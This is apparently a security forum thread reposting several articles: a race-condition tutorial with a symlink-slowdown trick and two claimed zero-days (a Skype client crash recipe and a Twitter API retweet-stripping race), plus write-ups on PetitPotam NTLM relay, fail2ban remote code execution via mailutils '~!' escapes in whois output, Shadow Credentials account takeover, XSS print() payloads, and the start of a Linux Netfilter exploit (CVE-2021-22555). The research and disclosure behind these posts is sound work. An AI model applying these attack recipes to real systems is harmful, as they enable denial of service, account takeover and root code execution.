wet a towel (or a bunch of towels) and wrap them around your device while making sure than the fan in particular is covered completely. Deep symlinks can also be used to slow down the execution of the program, which is extremely valuable while attempting to exploit race conditions. This is a very old and well-documented method, although these days it is practically useless (unless you’re exploiting some old obscure system, or if you’re doing it for a CTF — I have seen this method utilized in CTF challenges before). Since Linux Kernel 2.4x, this method has been mitigated through implementation of a limit on the maximum number of symlink dereferences permitted during lookups alongside limits on nesting depths. Despite this method being practically dead, I figured it’s still worth covering because there are still some obscure cases where this can be utilized. below is a script written by Rafal Wojtczuk demonstrating how this can be done (the example shown here can be found at Hacker’s Hut😞 This will cause the kernel to take a ridiculously long length of time to access a single file, here is the situation presented when the above script is executed: drwxr-xr-x 2 aeb 4096 l lrwxrwxrwx 1 aeb 53 l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services lrwxrwxrwx 1 aeb 19 l1 -> l2/../l2/../l2/../l lrwxrwxrwx 1 aeb 19 l2 -> l3/../l3/../l3/../l lrwxrwxrwx 1 aeb 19 l3 -> l4/../l4/../l4/../l lrwxrwxrwx 1 aeb 19 l4 -> l5/../l5/../l5/../l drwxr-xr-x 2 aeb 4096 l5 Depending on how many parameters are passed to the above bash script, the larger the depth of the symlinks, meaning it can take days or even weeks for the one process to finish completion. On older machines, this will result in application-level DoS. There are many other ways in which symbolic links can be abused in order to achieve race conditions, if you want to learn more about this then I’d suggest googling as there’s simply too much to explain in a single blog post. Yet another method to slow down program execution is by increasing the timer interrupt frequency in order to force more load onto the kernel. Timer Interrupts within the Linux Kernel have a long and extensive history, so I will not be going in-depth here. In part 2 of this tutorial series you can expect many more advanced methods to slow down process execution. Final notes (and zero-days): I intentionally chose to leave out a number of methods for testing/exploiting race condition bugs within web applications, although I’ll be covering these in-depth in Part 2 of my race condition series. Meanwhile, I’ll give you an overview of what you can expect with Part 2, while also leaving you two race condition 0day exploits to (ethically) play around with. The second part of my tutorial series regarding race conditions is going to have a primary emphasis on race conditions in webapps, which I touched upon lightly in this current post. This post was my attempt at explaining what race conditions are, how they work, how to (ab)use them, and the implications of their existence in regards to bug bounty hunting. Now that I’ve covered what these bugs are and also provided a few examples of real working exploits demonstrating that race conditions do indeed exist within webapps, I’m going to be spending most of part two covering the following three areas: More advanced techniques of identifying race conditions specifically within web applications, methods of bypassing protections against this, lucrative sections of webapps to test in order to increase your chances at finding race condition bugs on a regular basis within web applications. More advanced (and several private) techniques used to slow down process execution, both within regular applications and within web applications (although mostly with emphasis on web applications since that will be the primary theme of Part 2 of this series), and how to use some practical dynamic linker tricks through hooking of (g)libc functions via LD_PRELOAD in userland/ring3, exactly like you would do with a rootkit, but with emphasis on using this to slow down program/process execution due to added strain on hooked common functions, as opposed to use of dynamic linker for stealth-based hooking. We are talking about exploiting race conditions here, not writing rootkits — so while some of these techniques are kind-of interchangeable, the methods I’ll be sharing would be very inefficient for an LD_PRELOAD based rootkit as it would make the victim’ machine slow as shit. For maintaining persistence on a hacked box, this is terrible, but for slowing down process execution to increase the odds of a race condition, this is great! You can expect me to expand upon dozens of methods of slowing down process execution to increase your odds of winning that race! Finally, just like this first part of my race condition exploitation series, I’ll be setting a trend by once again including two new zero-day exploits which are both race condition bugs. Skype Race Condition 0day: Create a Skype group chat Add a bunch of people Make two Skype bots and add them to the chat Have one bot repeatedly set the topic to ‘lol’ (lowercase) Have the other bot repeatedly set the topic to ‘LOL’ (uppercase) example, bot #1 repeatedly sends “/topic lololol” to the chat and bot #2 repeatedly sends “/topic LOLOLOL” If performed correctly, this will break the Skype client for everyone in the group chat. Every time they reload Skype, it will crash. It also makes it impossible for them to leave the group chat no matter what they try. The only way around this is to either create a fresh Skype account, or completely uninstall Skype, access skype via web (web.skype.com) to leave the group, and then reinstall Skype again. Twitter API TOC/TOU Race Condition 0day: There was a race condition bug affecting twitter’s API. This is a generic TOC/TOU race condition which allows various forms of unexpected behaviour to take place. By sending API requests concurrently to Twitter, it can result in the deletion of other people’s likes/retweets/followers. You would write a script with multiple threads, some threads sending an API request to retweet or like a tweet (from a third-party account), and the other threads simultaneously removing likes/RT’s from the same tweet from the same third-party account, once again making a request t Twitter’s API in order to do so. As a result of the Race Condition taking place, this would remove multiple likes and retweets from the affected post, rather than only the likes and retweets set to be removed via the API requests sent from the third-party account. While this has no direct security impact, it can drastically affect the outreach of a popular tweet. While running this script to simultaneously send the API requests from a third-party account, we managed to reduce a tweet with 2000+ Retweets down to 16 Retweets in a matter of minutes. The Proof-of-Concept code for this will be viewable within the “Exploits and Code Examples” section of the upcoming site of 0xFFFF where we plan to eventually integrate this blog. To see how this works in detail, you can read the full writeup here, published by a member of our team. That’s all for now — part two will be coming soon with more zerodays and a much bigger emphasis on exploitation of race condition bugs within web applications. Sursa: https://blog.0xffff.info/2021/06/23/winning-the-race-signals-symlinks-and-toc-tou/
  11. New PetitPotam NTLM Relay Attack Lets Hackers Take Over Windows Domains July 26, 2021 Ravie Lakshmanan A newly uncovered security flaw in the Windows operating system can be exploited to coerce remote Windows servers, including Domain Controllers, to authenticate with a malicious destination, thereby allowing an adversary to stage an NTLM relay attack and completely take over a Windows domain. The issue, dubbed "PetitPotam," was discovered by security researcher Gilles Lionel, who shared technical details and proof-of-concept (PoC) code last week, noting that the flaw works by forcing "Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function." MS-EFSRPC is Microsoft's Encrypting File System Remote Protocol that's used to perform "maintenance and management operations on encrypted data that is stored remotely and accessed over a network." Specifically, the attack enables a domain controller to authenticate against a remote NTLM under a bad actor's control using the MS-EFSRPC interface and share its authentication information. This is done by connecting to LSARPC, resulting in a scenario where the target server connects to an arbitrary server and performs NTLM authentication. "An attacker can target a Domain Controller to send its credentials by using the MS-EFSRPC protocol and then relaying the DC NTLM credentials to the Active Directory Certificate Services AD CS Web Enrollment pages to enroll a DC certificate," TRUESEC's Hasain Alshakarti said. "This will effectively give the attacker an authentication certificate that can be used to access domain services as a DC and compromise the entire domain. While disabling support for MS-EFSRPC doesn't stop the attack from functioning, Microsoft has since issued mitigations for the issue, while characterizing "PetitPotam" as a "classic NTLM relay attack," which permit attackers with access to a network to intercept legitimate authentication traffic between a client and a server and relay those validated authentication requests in order to access network services. "To prevent NTLM Relay Attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing," Microsoft noted. "PetitPotam takes advantage of servers where the Active Directory Certificate Services (AD CS) is not configured with protections for NTLM Relay Attacks." To safeguard against this line of attack, the Windows maker is recommending that customers disable NTLM authentication on the domain controller. In the event NTLM cannot be turned off for compatibility reasons, the company is urging users to take one of the two steps below - Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic. Disable NTLM for Internet Information Services (IIS) on AD CS Servers in the domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services PetitPotam marks the third major Windows security issue disclosed over the past month after the PrintNightmare and SeriousSAM (aka HiveNightmare) vulnerabilities. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Sursa: https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html
  12. fail2ban – Remote Code Execution JAKUB ŻOCZEK | July 26, 2021 | Research This article is about the recently published security advisory for a pretty popular software – fail2ban (CVE-2021-32749). The vulnerability, which could be massively exploited and lead to root-level code execution on multiple boxes, however this task is rather hard to achieve by regular person. It all has its roots in mailutils package and I’ve found it by a total accident when playing with mail command. The fail2ban analyses logs (or other data sources) in search of brute force traces in order to block such attempts based on the IP address. There are plenty of rules for different services (SSH, SMTP, HTTP, etc.). There are also defined actions which could be performed after blocking a client. One of these actions is sending an e-mail. If you search the Internet to find out how to send an e-mail from a command line, you will often get such solution: 1 $ echo "test e-mail" | mail -s "subject" user@example.org That is the exact way how one of fail2ban actions is configured to send e-mails about client getting blocked (./config/action.d/mail-whois.conf😞 1 2 3 4 5 6 7 8 actionban = printf %%b "Hi,\n The IP <ip> has just been banned by Fail2Ban after <failures> attempts against <name>.\n\n Here is more information about <ip> :\n `%(_whois_command)s`\n Regards,\n Fail2Ban"|mail -s "[Fail2Ban] <name>: banned <ip> from <fq-hostname>" <dest> There is nothing suspicious about the above, until knowing about one specific thing that can be found inside the mailutils manual. It is the tilde escape sequences: The ‘~!’ escape executes specified command and returns you to mail compose mode without altering your message. When used without arguments, it starts your login shell. The ‘~|’ escape pipes the message composed so far through the given shell command and replaces the message with the output the command produced. If the command produced no output, mail assumes that something went wrong and retains the old contents of your message. This is the way it works in real life: 1 2 3 4 5 6 7 8 9 jz@fail2ban:~$ cat -n pwn.txt 1 Next line will execute command 2 ~! uname -a 3 4 Best, 5 JZ jz@fail2ban:~$ cat pwn.txt | mail -s "whatever" whatever@whatever.com Linux fail2ban 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux jz@fail2ban:~$ If you get back to the previously mentioned fail2ban e-mail action you can notice there is a whois output attached to the e-mail body. So if we could add some tilde escape sequence to whois output of our IP address – well, it should end up with code execution. As root. What are our options? As attackers we need to control the whois output – how to achieve that? Well, the first thing which came into my mind was to kindly ask my ISP to contact RIPE and make a pretty custom entry for my particular IP address. Unfortunately – it doesn’t work like that. RIPE/ARIN/APNIC and others put entries for whole IP classes as minimum, not for particular one IP address. Also, I’m more than sure that achieving it is extremely hard in a formal way, plus the fact that putting malicious payload as a whois entry would make people ask questions. Is there a way to start my own whois server? Surprisingly – there is, and you can find a couple of them running over the Internet. By digging whois related RFC you can find information about an attribute called ReferralServer. If your whois client will find such an attribute in the response, it will query the server that was set in the value to get more information about the IP address or domain. Just take a look what happens when getting whois for 157.5.7.5 IP address: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 $ whois 157.5.7.5 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/resources/registry/whois/tou/ # # If you see inaccuracies in the results, please report at # https://www.arin.net/resources/registry/whois/inaccuracy_reporting/ # # Copyright 1997-2021, American Registry for Internet Numbers, Ltd. # NetRange: 157.1.0.0 - 157.14.255.255 CIDR: 157.4.0.0/14, 157.14.0.0/16, 157.1.0.0/16, 157.12.0.0/15, 157.2.0.0/15, 157.8.0.0/14 NetName: APNIC-ERX-157-1-0-0 NetHandle: NET-157-1-0-0-1 Parent: NET157 (NET-157-0-0-0-0) NetType: Early Registrations, Transferred to APNIC OriginAS: Organization: Asia Pacific Network Information Centre (APNIC) [… cut …] ReferralServer: whois://whois.apnic.net ResourceLink: http://wq.apnic.net/whois-search/static/search.html OrgTechHandle: AWC12-ARIN OrgTechName: APNIC Whois Contact OrgTechPhone: +61 7 3858 3188 OrgTechEmail: search-apnic-not-arin@apnic.net [… cut …] Found a referral to whois.apnic.net. % [whois.apnic.net] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html % Information related to '157.0.0.0 - 157.255.255.255' % Abuse contact for '157.0.0.0 - 157.255.255.255' is 'helpdesk@apnic.net' inetnum: 157.0.0.0 - 157.255.255.255 netname: ERX-NETBLOCK descr: Early registration addresses [… cut …] In theory and while having a pretty big network you could probably ask your Regional Internet Registries to use RWhois for your network. On the other hand – simply imagine black hats breaking into a server running rwhois, putting a malicious entry there and then starting the attack. To be fair this scenario seems to be way easier than becoming a big company to legally have its own whois server. In case you’re a government and you can simply control network traffic – the task is way easier. By taking a closer look at the whois protocol, we can notice few things: it was designed really long time ago, it’s pretty simple (you ask for IP or domain name and get the raw output), it’s unencrypted on the network level. By simply performing a MITM attack on an unencrypted protocol (which whois is) attackers could just put the tilde escape sequence and start an attack over multiple hosts. It’s worth remembering that the root problem here is mailutils which has this flaw by design. I believe a lot of people are unaware about such a feature, and there’s still plenty of software that could use the mail command this way. As could be noticed many times in history – security is hard and complex. Sometimes totally innocent functionality which you wouldn’t ever suspect for being a threat could be a cause of dangerous vulnerability. Author: Jakub Żoczek Sursa: https://research.securitum.com/fail2ban-remote-code-execution/
  13. Key-Checker Go scripts for checking API key / access token validity Update V1.0.0 🚀 Added 37 checkers! Screenshoot 📷 How to Install go get github.com/daffainfo/Key-Checker Reference 📚 https://github.com/streaak/keyhacks Sursa: https://github.com/daffainfo/Key-Checker
  14. Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover Elad Shamir The techniques for DACL-based attacks against User and Computer objects in Active Directory have been established for years. If we compromise an account that has delegated rights over a user account, we can simply reset their password, or, if we want to be less disruptive, we can set an SPN or disable Kerberos pre-authentication and try to roast the account. For computer accounts, it is a bit more complicated, but RBCD can get the job done. These techniques have their shortcomings: Resetting a user’s password is disruptive, may be reported, and may not be permitted per the Rules of Engagement (ROE). Roasting is time-consuming and depends on the target having a weak password, which may not be the case. RBCD is hard to follow because someone (me) failed to write a clear and concise post about it. RBCD requires control over an account with an SPN, and creating a new computer account to meet that requirement may lead to detection and cannot be cleaned up until privilege escalation is achieved. The recent work that Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_) published about AD CS made me think about other technologies that use Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos, and Windows Hello for Business was the obvious candidate, which led me to (re)discover an alternative technique for user and computer object takeover. Tl;dr It is possible to add “Key Credentials” to the attribute msDS-KeyCredentialLink of the target user/computer object and then perform Kerberos authentication as that account using PKINIT. In plain English: this is a much easier and more reliable takeover primitive against Users and Computers. A tool to operationalize this technique has been released alongside this post. Previous Work When I looked into Key Trust, I found that Michael Grafnetter (@MGrafnetter) had already discovered this abuse technique and presented it at Black Hat Europe 2019. His discovery of this user and computer object takeover technique somewhat flew under the radar, I believe because this technique was only the primer to the main topic of his talk. Michael clearly demonstrated this abuse in his talk and noted that it affected both users and computers. In his presentation, Michael explained some of the inner workings of WHfB and the Key Trust model, and I highly recommend watching it. Michael has also been maintaining a library called DSInternals that facilitates the abuse of this mechanism, and a lot more. I recently ported some of Michael’s code to a new C# tool called Whisker to be used via implants on operations. More on that below. What is PKINIT? In Kerberos authentication, clients must perform “pre-authentication” before the KDC (the Domain Controller in an Active Directory environment) provides them with a Ticket Granting Ticket (TGT), which can subsequently be used to obtain Service Tickets. The reason for pre-authentication is that without it, anyone could obtain a blob encrypted with a key derived from the client’s password and try to crack it offline, as done in the AS-REP Roasting Attack. The client performs pre-authentication by encrypting a timestamp with their credentials to prove to the KDC that they have the credentials for the account. Using a timestamp rather than a static value helps prevent replay attacks. The symmetric key (secret key) approach, which is the one most widely used and known, uses a symmetric key derived from the client’s password, AKA secret key. If using RC4 encryption, this key would be the NT hash of the client’s password. The KDC has a copy of the client’s secret key and can decrypt the pre-authentication data to authenticate the client. The KDC uses the same key to encrypt a session key sent to the client along with the TGT. PKINIT is the less common, asymmetric key (public key) approach. The client has a public-private key pair, and encrypts the pre-authentication data with their private key, and the KDC decrypts it with the client’s public key. The KDC also has a public-private key pair, allowing for the exchange of a session key using one of two methods: Diffie-Hellman Key Delivery The Diffie-Hellman Key Delivery allows the KDC and the client to securely establish a shared session key that cannot be intercepted by attackers performing passive man-in-the-middle attacks, even if the attacker has the client’s or the KDC’s private key, (almost) providing Perfect Forward Secrecy. I say _almost _because the session key is also stored inside the encrypted part of the TGT, which is encrypted with the secret key of the KRBTGT account. Public Key Encryption Key Delivery Public Key Encryption Key Delivery uses the KDC’s private key and the client’s public key to envelop a session key generated by the KDC. Traditionally, Public Key Infrastructure (PKI) allows the KDC and the client to exchange their public keys using Digital Certificates signed by an entity that both parties have previously established trust with — the Certificate Authority (CA). This is the Certificate Trust model, which is most commonly used for smartcard authentication. PKINIT is not possible out of the box in every Active Directory environment. The key (pun intended) is that both the KDC and the client need a public-private key pair. However, if the environment has AD CS and a CA available, the Domain Controller will automatically obtain a certificate by default. No PKI? No Problem! Microsoft also introduced the concept of Key Trust, to support passwordless authentication in environments that don’t support Certificate Trust. Under the Key Trust model, PKINIT authentication is established based on the raw key data rather than a certificate. The client’s public key is stored in a multi-value attribute called msDS-KeyCredentialLink, introduced in Windows Server 2016. The values of this attribute are Key Credentials, which are serialized objects containing information such as the creation date, the distinguished name of the owner, a GUID that represents a Device ID, and, of course, the public key. It is a multi-value attribute because an account have several linked devices. This trust model eliminates the need to issue client certificates for everyone using passwordless authentication. However, the Domain Controller still needs a certificate for the session key exchange. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can obtain a TGT for that user. Windows Hello for Business Provisioning and Authentication Windows Hello for Business (WHfB) supports multi-factor passwordless authentication. When the user enrolls, the TPM generates a public-private key pair for the user’s account — the private key should never leave the TPM. Next, if the Certificate Trust model is implemented in the organization, the client issues a certificate request to obtain a trusted certificate from the environment’s certificate issuing authority for the TPM-generated key pair. However, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account. The private key is protected by a PIN code, which Windows Hello allows replacing with a biometric authentication factor, such as fingerprint or face recognition. When a client logs in, Windows attempts to perform PKINIT authentication using their private key. Under the Key Trust model, the Domain Controller can decrypt their pre-authentication data using the raw public key in the corresponding NGC object stored in the client’s msDS-KeyCredentialLink attribute. Under the Certificate Trust model, the Domain Controller will validate the trust chain of the client’s certificate and then use the public key inside it. Once pre-authentication is successful, the Domain Controller can exchange a session key via Diffie-Hellman Key Delivery or Public Key Encryption Key Delivery. Note that I intentionally used the term “client” rather than “user” here because this mechanism applies to both users and computers. What About NTLM? PKINIT allows WHfB users, or, more traditionally, smartcard users, to perform Kerberos authentication and obtain a TGT. But what if they need to access resources that require NTLM authentication? To address that, the client can obtain a special Service Ticket that contains their NTLM hash inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM_SUPPLEMENTAL_CREDENTIAL entity. The PAC is stored inside the encrypted part of the ticket, and the ticket is encrypted using the key of the service it is issued for. In the case of a TGT, the ticket is encrypted using the key of the KRBTGT account, which the user should not be able to decrypt. To obtain a ticket that the user can decrypt, the user must perform Kerberos User to User (U2U) authentication to itself. When I first read the title of the RFC for this mechanism, I thought to myself, “Does that mean we can abuse this mechanism to Kerberoast any user account? That must be too good to be true”. And it was — the risk of Kerberoasting was taken into consideration, and U2U Service Tickets are encrypted using the target user’s session key rather than their secret key. That presented another challenge for the U2U design — every time a client authenticates and obtains a TGT, a new session key is generated. Also, KDC does not maintain a repository of active session keys — it extracts the session key from the client’s ticket. So, what session key should the KDC use when responding to a U2U TGS-REQ? The solution was sending a TGS-REQ containing the target user’s TGT as an “additional ticket”. The KDC will extract the session key from the TGT’s encrypted part (hence not really perfect forward secrecy) and generate a new service ticket. So, if a user requests a U2U Service Ticket from itself to itself, they will be able to decrypt it and access the PAC and the NTLM hash. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user. As per MS-PAC, the NTLM_SUPPLEMENTAL_CREDENTIAL entity is added to the PAC only if PKINIT authentication was performed. Back in 2017, Benjamin Delpy (@gentilkiwi) introduced code to Kekeo to support retrieving the NTLM hash of an account using this technique, and it will be added to Rubeus in an upcoming release. Abuse When abusing Key Trust, we are effectively adding alternative credentials to the account, or “Shadow Credentials”, allowing for obtaining a TGT and subsequently the NTLM hash for the user/computer. Those Shadow Credentials would persist even if the user/computer changed their password. Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options: Forge an RC4 silver ticket to impersonate privileged users to the corresponding host. Use the TGT to call S4U2Self to impersonate privileged users to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name. Key Trust abuse has the added benefit that it doesn’t delegate access to another account which could get compromised — it is restricted to the private key generated by the attacker. In addition, it doesn’t require creating a computer account that may be hard to clean up until privilege escalation is achieved. Whisker Alongside this post I am releasing a tool called “ Whisker “. Based on code from Michael’s DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol. Whisker has four functions: Add — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. List — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object. Remove — This function removes a key credential from the target object specified by a DeviceID GUID. Clear — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break. Requirements This technique requires the following: At least one Windows Server 2016 Domain Controller. A digital certificate for Server Authentication installed on the Domain Controller. Windows Server 2016 Functional Level in Active Directory. Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object. Detection There are two main opportunities for detection of this technique: If PKINIT authentication is not common in the environment or not common for the target account, the “Kerberos authentication ticket (TGT) was requested” event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank, as shown below: If a SACL is configured to audit Active Directory object modifications for the targeted account, the “Directory service object was modified” event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect synchronization account or the ADFS service account, which will typically act as the Key Provisioning Server and legitimately modify this attribute for users. Prevention It is generally a good practice to proactively audit all inbound object control for highly privileged accounts. Just as users with lower privileges than Domain Admins shouldn’t be able to reset the passwords of members of the Domain Admins group, less secure, or less “trustworthy”, users with lower privileges should not be able to modify the msDS-KeyCredentialLink attribute of privileged accounts. A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts. However, an attacker with WriteOwner or WriteDACL privileges will be able to override this control, which can be detected with a suitable SACL. Conclusion Abusing Key Trust Account Mapping is a simpler way to take over user and computer accounts in Active Directory environments that support PKINIT for Kerberos authentication and have a Windows Server 2016 Domain Controller with the same functional level. References Whisker by (@elad_shamir) Exploiting Windows Hello for Business (Black Hat Europe 2019) by Michael Grafnetter (@MGrafnetter) DSInternals by Michael Grafnetter (@MGrafnetter) Sursa: https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
  15. Eviatar Gerzi, Security Researcher, CyberArk Attackers are increasingly targeting Kubernetes clusters to compromise applications or abuse resources for things like crypto-coin mining. Through live demos, this research-based session will show attendees how. Eviatar Gerzi, who researches DevOps security, will also introduce an open source tool designed to help blue and red teams discover and eliminate risky permissions.Pre-Requisites: Basic experience with Kubernetes and familiarity with docker containers.
  16. Dr. Ruby, cred ca se pricepe la alte lucruri mai bine decat la medicina. Aici e profilul de Linkedin, NU e doctor: https://www.linkedin.com/in/dr-jane-ruby-49971411/ Bine, de fapt este doctor, doctor in psihologie. Mentioneaza un doctor in video, doctor HOMEOPAT (au uitat sa zica asta). Iar acel Gigel scoate articole de genul acesta in fiecare zi. Uitati-va macar la comentariile de pe Facebook, unele sunt pertitente. Bun venit pe Internet unde oricine zice ceva e adevarat.
  17. Uuu, pare sa fie un post fun!
  18. alert() is dead, long live print() James Kettle Director of Research @albinowax Published: 02 July 2021 at 13:27 UTC Updated: 05 July 2021 at 10:03 UTC Cross-Site Scripting and the alert() function have gone hand in hand for decades. Want to prove you can execute arbitrary JavaScript? Pop an alert. Want to find an XSS vulnerability the lazy way? Inject alert()-invoking payloads everywhere and see if anything pops up. However, there's trouble brewing on the horizon. Malicious adverts have been abusing our beloved alert to distract and social engineer visitors from inside their iframe. Google Chrome has decided to tackle this by disabling alert for cross-domain iframes. Cross-domain iframes are often built into websites deliberately, and are also a near-essential component of certain relatively advanced XSS attacks. Once Chrome 92 lands on 20th July 2021, XSS vulnerabilities inside cross-domain iframes will: No longer enable alert-based PoCs. Be invisible to anyone using alert-based detection techniques. What next? The obvious workaround is to use prompt or confirm, but unfortunately Chrome's mitigation blocks all dialogs. Triggering a DNS pingback to a listener, OAST-style is another potential approach, but less suitable as a PoC due to the config requirements. We also ruled out console.log() as console functions are often proxied or disabled by JavaScript obfuscators. It's quite funny that this "protection" against showing dialogs cross domain blocks alerts and prompts but as Yosuke Hasegawa pointed out they forgot about basic authentication. This works in the current version of canary. It's likely to be blocked in future though. We needed an alert-alternative that was: Simple, setup-free and easy to remember Highly visible, even when executed in an invisible iframe After weeks of intensive research, we're thrilled to bring you... print() We will be updating our Web Security Academy labs to support print() based solutions shortly. The XSS cheat sheet will also be updated to reflect the new print() payloads when using cross domain iframes. We'll keep using alert when there's no iframes involved... for now. Long live print! - Gareth & James Sursa: https://portswigger.net/research/alert-is-dead-long-live-print
      • 1
      • Sad
  19. CVE-2021-22555: Turning \x00\x00 into 10000$ Andy Nguyen (theflow@) - Information Security Engineer CVE-2021-22555 is a 15 years old heap out-of-bounds write vulnerability in Linux Netfilter that is powerful enough to bypass all modern security mitigations and achieve kernel code execution. It was used to break the kubernetes pod isolation of the kCTF cluster and won 10000$ for charity (where Google will match and double the donation to 20000$). Table of Contents Introduction Vulnerability Exploitation Exploring struct msg_msg Achieving use-after-free Bypassing SMAP Achieving a better use-after-free Finding a victim object Bypassing KASLR/SMEP Escalating privileges Kernel ROP chain Escaping the container and popping a root shell Proof-Of-Concept Timeline Thanks Introduction After BleedingTooth, which was the first time I looked into Linux, I wanted to find a privilege escalation vulnerability as well. I started by looking at old vulnerabilities like CVE-2016-3134 and CVE-2016-4997 which inspired me to grep for memcpy() and memset() in the Netfilter code. This led me to some buggy code. Vulnerability When IPT_SO_SET_REPLACE or IP6T_SO_SET_REPLACE is called in compatibility mode, which requires the CAP_NET_ADMIN capability that can however be obtained in a user+network namespace, structures need to be converted from user to kernel as well as 32bit to 64bit in order to be processed by the native functions. Naturally, this is destined to be error prone. Our vulnerability is in xt_compat_target_from_user() where memset() is called with an offset target->targetsize that is not accounted for during the allocation - leading to a few bytes written out-of-bounds: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr, unsigned int *size) { const struct xt_target *target = t->u.kernel.target; struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t; int pad, off = xt_compat_target_offset(target); u_int16_t tsize = ct->u.user.target_size; char name[sizeof(t->u.user.name)]; t = *dstptr; memcpy(t, ct, sizeof(*ct)); if (target->compat_from_user) target->compat_from_user(t->data, ct->data); else memcpy(t->data, ct->data, tsize - sizeof(*ct)); pad = XT_ALIGN(target->targetsize) - target->targetsize; if (pad > 0) memset(t->data + target->targetsize, 0, pad); tsize += off; t->u.user.target_size = tsize; strlcpy(name, target->name, sizeof(name)); module_put(target->me); strncpy(t->u.user.name, name, sizeof(t->u.user.name)); *size += off; *dstptr += tsize; } The targetsize is not controllable by the user, but one can choose different targets with different structure sizes by name (like TCPMSS, TTL or NFQUEUE). The bigger targetsize is, the more we can vary in the offset. Though, the target size must not be 8 bytes aligned in order to fulfill pad > 0. The biggest possible I found is NFLOG for which we can choose an offset up to 0x4C bytes out-of-bounds (one can influence the offset by adding padding between struct xt_entry_match and struct xt_entry_target😞 struct xt_nflog_info { /* 'len' will be used iff you set XT_NFLOG_F_COPY_LEN in flags */ __u32 len; __u16 group; __u16 threshold; __u16 flags; __u16 pad; char prefix[64]; }; Note that the destination of the buffer is allocated with GFP_KERNEL_ACCOUNT and can also vary in the size: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c struct xt_table_info *xt_alloc_table_info(unsigned int size) { struct xt_table_info *info = NULL; size_t sz = sizeof(*info) + size; if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE) return NULL; info = kvmalloc(sz, GFP_KERNEL_ACCOUNT); if (!info) return NULL; memset(info, 0, sizeof(*info)); info->size = size; return info; } Though, the minimum size is > 0x100 which means that the smallest slab this object can be allocated in is kmalloc-512. In other words, we have to find victims which are allocated between kmalloc-512 and kmalloc-8192 to exploit. Exploitation Our primitive is limited to writing four bytes of zero up to 0x4C bytes out-of-bounds. With such a primitive, usual targets are: Reference counter Unfortunately, I could not find any suitable objects with a reference counter in the first 0x4C bytes. Free list pointer CVE-2016-6187: Exploiting Linux kernel heap off-by-one is a good example on how to exploit the free list pointer. However, this was already 5 years ago, and meanwhile, kernels have the CONFIG_SLAB_FREELIST_HARDENED option enabled which among other things protects free list pointers. Pointer in a struct This is the most promising approach, however four bytes of zero is too much to write. For example, a pointer 0xffff91a49cb7f000 could only be turned to 0xffff91a400000000 or 0x9cb7f000, where both of them would likely be invalid pointers. On the other hand, if we used the primitive to write at the very beginning of the adjacent block, we could write less bytes, e.g. 2 bytes, and for example turn a pointer from 0xffff91a49cb7f000 to 0xffff91a49cb70000. Playing around with some victim objects, I noticed that I could never reliably allocate them around struct xt_table_info on kernel 5.4. I realized that it had something to do with the GFP_KERNEL_ACCOUNT flag, as other objects allocated with GFP_KERNEL_ACCOUNT did not have this issue. Jann Horn confirmed that before 5.9, separate slabs were used to implement accounting. Therefore, every heap primitive we use in the exploit chain should also use GFP_KERNEL_ACCOUNT. The syscall msgsnd() is a well known primitive for heap spraying (which uses GFP_KERNEL_ACCOUNT) and has been utilized for multiple public exploits already. Though, its structure msg_msg has surprisingly never been abused. In this write-up, we will demonstrate how this data-structure can be abused to gain a use-after-free primitive which in turn can be used to leak addresses and fake other objects. Coincidentally, in parallel to my research in March 2021, Alexander Popov also explored the very same structure in Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel. Exploring struct msg_msg When sending data with msgsnd(), the payload is split into multiple segments: // https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c static struct msg_msg *alloc_msg(size_t len) { struct msg_msg *msg; struct msg_msgseg **pseg; size_t alen; alen = min(len, DATALEN_MSG); msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); if (msg == NULL) return NULL; msg->next = NULL; msg->security = NULL; len -= alen; pseg = &msg->next; while (len > 0) { struct msg_msgseg *seg; cond_resched(); 